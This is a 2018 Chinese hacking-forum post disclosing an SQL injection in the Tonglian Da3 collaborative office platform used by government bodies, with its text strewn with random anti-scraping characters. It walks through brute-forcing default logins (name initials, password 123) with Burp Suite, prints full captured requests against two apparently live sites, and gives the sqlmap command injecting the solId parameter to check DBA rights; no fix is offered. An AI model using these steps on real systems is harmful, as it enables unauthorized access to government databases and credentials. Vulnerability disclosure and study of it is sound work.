找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1390|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

# T* _7 A+ V# }& @% Q! U. H: ]
) n1 n6 A M: ~7 P; T

; |; j9 H. A) z/ ]+ I/ @6 T+ V

/ `' G+ a) E/ w$ ]* s/ Y- R1 Q 平台简介:- z$ ^, y. i s o: J. u1 J, V0 A

% n8 `) b3 \4 ^" |6 u: y6 d) L( [! s

& H2 d2 b$ r8 X d8 i7 I5 G$ N( n2 F( W  1 \! p, o, O; C, ~" G8 [

( Z$ `) G' q B, w

' \" K7 I( a- F* o 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
5 X, `7 D/ ~' f" g 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ Y2 R8 W! a3 x3 ^' S" a$ ?. L9 W* H7 W同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! 9 r9 F& V8 w2 B# `" R8 \! a

7 X+ H; @2 o1 V# y

+ K6 _6 j" \ _5 V5 f2 S3 J! G1 h   ; p5 x' T$ d7 s& ?

% y! h1 W# C# B M4 ^- _& R1 w

. S5 U% G* w; I2 p) V 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:$ \! I. w P2 X9 e3 L- Q

4 @# y2 I, u) R

, J. E" s% X0 x: [0 n" ^1 s$ v   2 U# d! N( a! q' N) P c% k

, g, |; |: }6 T1 U7 E

2 m% H1 u% G/ j7 Z5 W) z: I http://1.1.1.1:7197/cap-aco/#(案例2-) , L: \& Y" o, ~% F ^& A! h& K% E& G

( O+ o9 \" C' d: G% K) v/ C, n* L

7 l( t+ _$ j/ L4 l/ T, i4 a http://www.XXOO.com (案例1-官网网站)+ Q, Y* r+ n5 y1 d

P" C1 ~+ N0 u# K) E* `

7 A) N5 p5 L: E. b  9 |: W' v% r5 g

# V0 q- e6 ]2 r3 U* A

" p: l/ x+ J: x1 O! ?: r9 R5 U 漏洞详情: ( }" G+ \% X, A: H: B

- S# }/ c& d+ h: w

+ s y; g0 _5 ~1 W  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 8 E5 K7 @" l* d0 K, o: [. r

7 I) p. f o) ?+ _; p, H

4 J" W; i+ h M/ d7 M9 D. m; B      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:( M# X( o5 M9 N) K% Q/ j5 e

( o, P+ d% w8 h( P

F) {) f5 C$ l8 [$ ]   3 s" ?2 S2 _0 E

; x* d4 N( ~* X6 q* }

- H+ {- v# |$ u+ W2 }   ' h" |5 b; C. [1 s) p8 s9 Q; D

% _& P# o0 [% v* G

% M: l Z/ a- E j a* {( M* z status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:; \9 ]( x% P- ?! ?: ]

5 ^( |9 T2 V6 O+ p- a

% ?3 L% Q: ?/ m2 s 1、案例1-官方网站( ^+ `9 V% @7 h( l

* n7 m+ ?- d5 X; @1 V

! s$ Y5 h6 g2 t5 A- o# @; @6 i GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 $ H: {: C6 D" ~% \( B

2 a, M( ?* _& W7 C A

* j9 V( M5 B+ b8 K3 P& n7 q5 l. I Host: www.XXOO.com8 x' K6 h, s& S6 D0 A3 `- q9 v

3 Y! v6 J/ Q) N

; d) d% G; O; k5 Y, o4 n Proxy-Connection: Keep-Alive ' X( N/ t' S/ R# y9 n: v4 J

$ T7 {, z: [- c/ J7 y; ~- s( O

2 {0 Q" k4 u& h3 a Accept: application/json, text/javascript, */*; q=0.016 m7 B( _4 [5 A

0 J, M( \( W2 ?" r% U' y5 ]/ D4 C. f' p

9 v& u3 d2 ^2 T/ e Accept-Language: zh-CN& u7 [9 d1 I* }" j0 u. g

# @% A2 q' D% W o2 F

$ k0 c8 [; g/ `4 C% j. `. ^ Content-Type: application/json 0 B1 L7 L! e u5 ~3 `$ Y

4 e/ t% D3 [# c. s( T

& S* h+ G2 i4 r; X User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko, x1 x5 |5 u7 H

) j: I; J4 f; j+ B

3 ?( c* o- D" X X-Requested-With: XMLHttpRequest0 M6 Y) \8 d% _

# e5 Q$ I+ L8 i

6 f# f$ k. s5 o; M Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002* j1 w0 o6 T( C1 S/ m" Q9 L" ^

3 i1 V G) Q& }

/ D2 K# K4 X3 e; X6 ^5 t Accept-Encoding: gzip, deflate, sdch# R% K: O9 B V0 O7 Z( \

+ J. G( b' k4 D7 N0 p

. P+ i# N# H, j f7 o Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e3 a; K( b- F$ s; i6 g

4 F$ `! D( E) w; n W

^* o7 q. u6 Z. B3 h3 \ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 2 h" j3 o& Z1 A# v- D

; t' M" _- W5 T' O9 x

0 V+ u; H3 {9 s6 k  ) \% J8 _, s4 S/ U: s& R! F& J3 O

; e/ ^0 `1 c% {' `& b, {; P

/ ^. }8 H: l) _; N M  " c$ G: T( O% L9 N0 s- m, A8 O

! C+ U* \2 C: s8 ?5 D! U

& Y( ~+ J' L1 \9 n  , e" a5 b+ w0 F7 X

- z& ?+ Z9 d$ P3 H+ q8 _

v4 p0 N6 [+ R# Q1 s# l& A   |( B) ~/ _: U* k1 P7 S, r

% ?! z+ D4 p9 l: w

4 H! s u* z/ y- i' }3 k% i- q   ^. {$ t1 Y2 ]4 z7 \3 m

+ ]* {9 ^9 v: Q. x7 z/ C

6 T( x, o9 Z3 X/ V 2、案例2-某天河云平台/ {. f1 j1 r9 {, D+ j4 A* G5 C

5 \/ O, Y9 @7 X; O$ |

6 a4 M% ?! ^ e9 {: ?. V0 e GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1: O1 ?8 H7 n4 U9 M& o

. }& d4 C4 p4 K$ Z3 N, }1 h

+ m8 O& d1 Y, C/ `4 ? Host: 1.1.1.:7197 - c/ R; A( `8 a) E. S" Z6 y

. Y) p9 G( Y& _$ T

6 u& O/ \8 b' w9 @ Accept: application/json, text/javascript, */*; q=0.01 . H2 k% |( d- W( b

5 T e; Y+ L6 ]$ ?

4 S4 Q* [& T1 c6 Q; A' V6 } K2 a X-Requested-With: XMLHttpRequest - x8 j* h, m7 Z3 J( U! X/ C1 o8 E

; I' P0 ^6 I1 }: E$ U- z

, n6 h9 @& b8 w% O" h3 T* s User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.09 M5 b6 s3 [9 v! G( W

* g0 B1 D% ?7 I" M

: W( v7 s3 J [; n- { Content-Type: application/json! H$ s- {3 H4 l- Q4 J9 c8 U) T

7 O. y, n. Q* h) T6 `

' o: j) ~' |& P& V Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008# @0 i& ?. M) H5 e& v5 b' P8 V

1 ^$ T8 ^4 C* e4 T" J, Z

8 }* _- y- [& Q1 J. ~ Accept-Language: zh-CN,zh;q=0.8* p, W5 g8 N/ {7 x7 s/ w1 i

) ]* [4 P# k' Y! ^% _. \8 a3 z, I

; O( f/ {6 N! w2 l Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=11 m( S) I6 e1 T" l0 D

/ y1 \2 j9 Z3 l" c0 o+ i- v! {

/ X+ c9 ^5 l& Q r: W! Y7 {1 I Connection: close + @2 Y; u. m: ?9 U/ P$ D$ Q0 @( Q

' ?! B! R) c! @! ~7 [

# P/ ?1 s; D: M8 K* q2 C 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: . Y" f/ @( D& J0 r; C0 Z

' Z( W6 z& T: U$ N# L& T

x" Z: F+ `! K+ N   7 f3 k7 m0 h$ J" m% A9 O0 z* F9 w; Q

8 S% R" X* I" c0 q. n" ~/ B, E

$ @$ s d2 L4 A, ^0 v; l
' a9 I+ _# |7 W

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表